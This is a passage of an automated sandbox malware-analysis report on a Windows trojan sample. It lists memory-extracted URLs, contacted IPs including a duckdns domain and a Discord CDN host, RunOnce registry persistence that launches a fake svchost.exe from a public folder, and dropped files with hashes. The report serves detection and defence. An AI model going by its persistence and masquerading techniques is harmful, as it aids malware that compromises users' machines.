                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000015.00000003.291332934.00000184E6E31000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000015.00000003.319122610.00000184E6E5A000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000015.00000003.291332934.00000184E6E31000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000015.00000003.317511833.00000184E6E5D000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000015.00000002.321257361.00000184E6E5C000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000015.00000002.321223246.00000184E6E42000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://dynamic.tsvchost.exe, 00000015.00000003.315510750.00000184E6E64000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.319122610.00000184E6E5A000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000015.00000002.321205709.00000184E6E3A000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000015.00000003.317511833.00000184E6E5D000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/names9SWgUgyO5.exe, 00000000.00000000.282547862.0000000002EC1000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000000.368578421.0000000002AA1000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000000.383088847.0000000003211000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://activity.windows.comsvchost.exe, 00000010.00000002.511181414.0000020ADC43E000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.bingmapsportal.comsvchost.exe, 00000015.00000002.321159443.00000184E6E13000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000015.00000002.321213587.00000184E6E3C000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://%s.dnet.xboxlive.comsvchost.exe, 00000010.00000002.511181414.0000020ADC43E000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      low
                                                                                      https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000015.00000002.321257361.00000184E6E5C000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000015.00000003.319122610.00000184E6E5A000.00000004.00000001.sdmpfalse
                                                                                          high

                                                                                          Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          194.147.140.25
                                                                                          friomo.duckdns.orgunknown
                                                                                          47285PTPEUfalse
                                                                                          162.159.130.233
                                                                                          unknownUnited States
                                                                                          13335CLOUDFLARENETUStrue
                                                                                          162.159.133.233
                                                                                          cdn.discordapp.comUnited States
                                                                                          13335CLOUDFLARENETUSfalse

                                                                                          Private

                                                                                          IP
                                                                                          192.168.2.1
                                                                                          127.0.0.1

                                                                                          General Information

                                                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                                                          Analysis ID:491708
                                                                                          Start date:27.09.2021
                                                                                          Start time:20:26:26
                                                                                          Joe Sandbox Product:CloudBasic
                                                                                          Overall analysis duration:0h 13m 57s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:light
                                                                                          Sample file name:s9SWgUgyO5.exe
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                          Number of analysed new started processes analysed:50
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • HDC enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.expl.evad.winEXE@68/65@19/5
                                                                                          EGA Information:Failed
                                                                                          HDC Information:
                                                                                          • Successful, ratio: 1.1% (good quality ratio 0.3%)
                                                                                          • Quality average: 16%
                                                                                          • Quality standard deviation: 24.1%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 0
                                                                                          • Number of non-executed functions: 0
                                                                                          Cookbook Comments:
                                                                                          • Adjust boot time
                                                                                          • Enable AMSI
                                                                                          • Found application associated with file extension: .exe
                                                                                          Warnings:
                                                                                          Show All
                                                                                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                          • TCP Packets have been reduced to 100
                                                                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 92.122.145.220, 95.100.54.203, 93.184.220.29, 52.168.117.173, 20.82.209.183, 20.42.65.92, 104.208.16.94, 20.82.210.154, 23.10.249.43, 23.10.249.26
                                                                                          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491708/sample/s9SWgUgyO5.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          20:27:31API Interceptor248x Sleep call for process: powershell.exe modified
                                                                                          20:27:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Public\Documents\\svchost.exe
                                                                                          20:27:33API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                          20:27:42API Interceptor833x Sleep call for process: s9SWgUgyO5.exe modified
                                                                                          20:27:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Public\Documents\\svchost.exe
                                                                                          20:28:01API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                          20:29:04API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          No context

                                                                                          Domains

                                                                                          No context

                                                                                          ASN

                                                                                          No context

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4096
                                                                                          Entropy (8bit):0.597889115294713
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:bVWtlEk1GaD0JOCEfMuaaD0JOCEfMKQmDFWitAl/gz2cE0fMbhEZolrRSQ2hyYI8:bSlrGaD0JcaaD0JwQQLtAg/0bjSQJ
                                                                                          MD5:C6B68FB446CD9655465B2DD69E146736
                                                                                          SHA1:03F43D3D709A5944E210445374C4619962D6444A
                                                                                          SHA-256:69F79C824C096D6B49E00C8D1AAD53B366F8D3AFE952C57BE9AF940200B1BA9E
                                                                                          SHA-512:BCDB6FA27F9B5BF4560F4834030EAAFAB43D602E935F8B79776E678824FB353DE8188ED1D81E545EF21F931CC1BE71BCFE32C05D80E469B7318112E64BA52574
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: ....E..h..(....."....y3.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..................."....y3...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa184da57, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                          Category:dropped
                                                                                          Size (bytes):32768
                                                                                          Entropy (8bit):0.09696631501936084
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:pOzzwl/+sP8N3sXRIE11Y8TRX6ogcDflyKLOzzwl/+sP8N3sXRIE11Y8TRX6ogcL:C0+UXO4bl63Kg0+UXO4bl63K
                                                                                          MD5:A79A19C44ED55C14608E240BFEE5BFC8
                                                                                          SHA1:DB83C48EA201EEC5AE496B9A5367F16CE4D0F555
                                                                                          SHA-256:D06731C38753D22630BDBF3DEBECC4179FD3D6156ABA77898CB147371C0331EA
                                                                                          SHA-512:202A3D494E4BA27C5EC699002EA288A37BA648BBC01C67805C9558E1C83881B08AFF5F2CA4CDBEC4712120E4FAE5FBDB111843E24E7F4A3AA632503F1656D9D5
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: ...W... ................e.f.3...w........................&..........w.."....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................:.."....yk.................v_.."....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8192
                                                                                          Entropy (8bit):0.11110880985443841
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Kr9EvHa+/Jl/bJdAticDflltloll:Kk6AJt4ZDfle
                                                                                          MD5:158866F10AA15FE3B9B505397ACAA82E
                                                                                          SHA1:D1BCC215039A4DDF95F059A0A4D2AEC96868C3BF
                                                                                          SHA-256:CAB746946665B9DB240EE9FF91B63FF69703B2D5C32D38D5B83094EEA59240A3
                                                                                          SHA-512:403DF18B675DF154FB3E5F5EAC2AFAD6B41361D681A2CB147BEC5EB032162594E187E2285BB80C4F175DB42019F99A2920ED088E9B947F46FC776D404EEC15CA
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: P.ru.....................................3...w.."....y.......w...............w.......w....:O.....w..................v_.."....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_s9SWgUgyO5.exe_906cf9c9d383b63dc7dffe55c9f4374d6972c2_bc6c4cc7_044e01f0\Report.wer
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):17054
                                                                                          Entropy (8bit):3.758286325439245
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:PAgoTh6mHBUZMXiaKeCvgdw1Z/u7srS274ItEs:4t9rBUZMXiaeAu/u7srX4ItEs
                                                                                          MD5:0030545419B1EA08860E5C7687B4AD98
                                                                                          SHA1:E3D8AA8A5823C483B631093DE91F7338EB21279B
                                                                                          SHA-256:B1BE483413F694B06C1CC9E897D523DE50A022CD56DD2B54C17E3CF3763D89F1
                                                                                          SHA-512:380D298F8737046A1F2EA2E93A24CD15835B00510DE1484016FC34FAB02148EA1B4F4C68249505EDE2C19C7FC8FD511205F5D47E3D3A477BF6AAFE4F22B636DF
                                                                                          Malicious:true
                                                                                          Reputation:unknown
                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.2.7.3.2.6.8.2.3.8.9.5.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.7.2.7.3.2.7.7.8.4.8.2.9.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.1.b.9.6.f.4.-.e.b.8.0.-.4.4.6.2.-.8.6.2.9.-.5.6.d.6.9.a.e.0.c.e.a.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.8.a.9.4.3.1.-.6.3.9.5.-.4.8.d.5.-.b.7.6.5.-.8.e.c.d.9.3.0.d.7.2.d.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.9.S.W.g.U.g.y.O.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.e.8.-.0.0.0.1.-.0.0.1.6.-.b.c.7.0.-.9.e.c.1.1.8.b.4.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.f.7.a.4.9.7.9.6.f.2.4.0.7.d.0.d.a.a.e.a.0.d.9.2.0.d.3.9.e.c.9.0.0.0.0.0.0.0.0.!.0.0.0.0.0.a.c.9.e.2.6.1.e.a.f.c.3.6.f.2.d.8.a.7.b.d.a.5.7.5.5.b.4.4.c.9.d.8.c.8.8.3.e.9.!.s.9.S.W.g.U.g.y.O.5...e.x.e.....T.a.r.g.e.t.A.p.p.V.
                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_f7137cbad9f7f196b5e4d4e5d71130be24217a9_1341e600_0bfe5ce1\Report.wer
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):16900
                                                                                          Entropy (8bit):3.7746319243941113
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:0Am9nNPHBUZMXyaKeCvgdwNt/u7sQS274It53l:5mVFBUZMXyaeAK/u7sQX4It5V
                                                                                          MD5:F221E9557D3B7634FCA08DE93459FCA5
                                                                                          SHA1:C01CBECEE8C5CAE25A85D2F1A5D3FAAF235FFCEB
                                                                                          SHA-256:D7CA1E87A67C87F7589E2C450D6DAB5DBABC4ACFE7B337B9BD2DEC53615086A5
                                                                                          SHA-512:14F5EB95CBD5ABB8A78C24FE910A7B16B288E899576454B49F328B19195D6A971C240E9B753EB8643A43553E6CEB07F30803AAFAEB5E16097FEDE64F4F425ADE
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.2.7.3.2.8.8.2.6.0.1.7.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.7.2.7.3.3.0.3.4.1.6.3.4.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.c.d.8.b.2.f.-.0.f.6.c.-.4.1.4.2.-.b.6.b.e.-.8.e.1.8.e.0.e.f.8.a.d.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.1.6.0.5.e.9.f.-.f.d.6.6.-.4.8.0.8.-.9.0.a.e.-.e.1.8.c.9.a.b.0.5.f.2.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.5.c.-.0.0.0.1.-.0.0.1.6.-.d.2.a.4.-.9.b.c.b.1.8.b.4.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.f.7.a.4.9.7.9.6.f.2.4.0.7.d.0.d.a.a.e.a.0.d.9.2.0.d.3.9.e.c.9.0.0.0.0.0.0.0.0.!.0.0.0.0.0.a.c.9.e.2.6.1.e.a.f.c.3.6.f.2.d.8.a.7.b.d.a.5.7.5.5.b.4.4.c.9.d.8.c.8.8.3.e.9.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.
                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_f7137cbad9f7f196b5e4d4e5d71130be24217a9_1341e600_15a2778d\Report.wer
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):16804
                                                                                          Entropy (8bit):3.77561932599221
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:2/9n8PHBUZMXyaPXUAeZn/K/u7sQS274It5h:AVEBUZMXyapmS/u7sQX4It5h
                                                                                          MD5:671D08D466B7F86D48FCF156246E12FA
                                                                                          SHA1:5ACBFCB3D7A4D8A0025C32E373C7F2E875B8B9B3
                                                                                          SHA-256:EF364091439091F51917B1B6EDA6DEA22D112C341F05C676A8EFAA90E0E0C828
                                                                                          SHA-512:0CDE87A86C1E9546AB45742547917C5CE0B90C0E90D191DC321AFC2FD726D91421CA2F5D1509B38318638F217A7BE57D39A43E36468EA5FEF3695997E22D8A6D
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.2.7.3.3.0.6.1.1.2.0.0.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.7.2.7.3.3.1.0.6.5.8.9.2.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.1.c.d.5.c.8.-.4.a.5.8.-.4.9.b.3.-.9.c.e.5.-.9.2.8.1.2.c.e.9.2.c.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.c.4.1.7.0.6.-.0.a.1.0.-.4.6.4.a.-.8.b.4.2.-.0.7.5.a.9.e.9.8.c.6.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.4.8.-.0.0.0.1.-.0.0.1.6.-.e.b.8.1.-.2.6.d.1.1.8.b.4.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.f.7.a.4.9.7.9.6.f.2.4.0.7.d.0.d.a.a.e.a.0.d.9.2.0.d.3.9.e.c.9.0.0.0.0.0.0.0.0.!.0.0.0.0.0.a.c.9.e.2.6.1.e.a.f.c.3.6.f.2.d.8.a.7.b.d.a.5.7.5.5.b.4.4.c.9.d.8.c.8.8.3.e.9.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CFA.tmp.dmp
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Sep 28 03:28:15 2021, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):323198
                                                                                          Entropy (8bit):3.725504600376241
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:dn0eGjd+pXBS+dsAq49gIOgF5Et0MUCgUgkyic57GoGW1YdZ0z:10QpX9RpDOHTj9Pu
                                                                                          MD5:9BB5BD22BDF503CB6B7A78C47D60A59D
                                                                                          SHA1:2AC261E5AE1B3FA55E1B8845C3D4BAADAC8426A0
                                                                                          SHA-256:FD59FC389C328D780BF9717CF6AFA29F87F48772FB9DB7266C06480CCC959B71
                                                                                          SHA-512:B7E12F63A2EBEC089FA3005AF5117C4999F3C56434EA9820C25F6D607B65D79A3F4412A7986E194896B872A7CF3D447A586AC669586A5A4CCC2FDD373BE68C95
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: MDMP....... ........Ra...................U...........B......X0......GenuineIntelW...........T.......\.....Ra.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D71.tmp.WERInternalMetadata.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8398
                                                                                          Entropy (8bit):3.694226526923169
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Rrl7r3GLNi1D36o6YIpSUO81dgmfZBSnCprRV89bSCsfCmm:RrlsNi1z6o6Y2SUO81dgmfPSsCSBf6
                                                                                          MD5:C899446972CBE9D56ACDE8F6E6091D44
                                                                                          SHA1:094D536E778CE700AF5F4748B6E5193EF7D5E2C3
                                                                                          SHA-256:BFEFEC2412ED7A970276B99890115B61D969C66C2E1D13CD8864DDDD9292C8D7
                                                                                          SHA-512:0626FFB91545B66F1C9D42DA2C8092FCED2B6C69DBD3930B40AFF68D3BCFD4F63B859AFB90B7AA848A70E5EC6FA14BDBD9503148389DC13915E6DC64E527F8F4
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.5.6.<./.P.i.d.>.......
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F37.tmp.xml
                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4676
                                                                                          Entropy (8bit):4.447974775107029
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwSD8zsItJgtWI9p1WSC8B+2a8fm8M4JCulhLC2O7Fc+q8v5lhLC2ON/rA4icz:uITfIH+ESN/JCum2jK5m2AzA4iidd
                                                                                          MD5:8E8A29E0934E36ABBCF48CA698D0F548
                                                                                          SHA1:D7B01745C1F43B300A0A0A2E5F90DFB27417EC9E
                                                                                          SHA-256:87F68171C2EA2B0EC19F150A6CCF763720058017A20CCCF0B4DE4606B2EF086C
                                                                                          SHA-512:B0D6457B5B01AA60C770B7019BCDB03DCFCAF3BF1733B049008546A10FCFE4368F3720E04C1ABC7E10FBC4235C754CFF48100B8CDAD02EB7002CE23FCD5F42F3
                                                                                          Malicious:false
                                                                                          Reputation:unknown
                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1185878" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F47.tmp.csv
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):56290
                                                                                          Entropy (8bit):3.05501169844307
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:lKH+OqsptLjdNoREgZ6nWwzHDXemQ9clBhT78Uw+p:lKH+OqsptLjdNoREgZ6nWwzH7emQ9cl/
                                                                                          MD5:0DAD44EDB9FFB5E88BC76F55ADA34BDD
                                                                                          SHA1:3A7D4A3E218C0AC91B32B44E93B581AE5AF929F3
                                                                                          SHA-256:FE783812F1AFA7C23A45FEC63BD9E142264F6A5913C0F768FAD76AB7136E718A
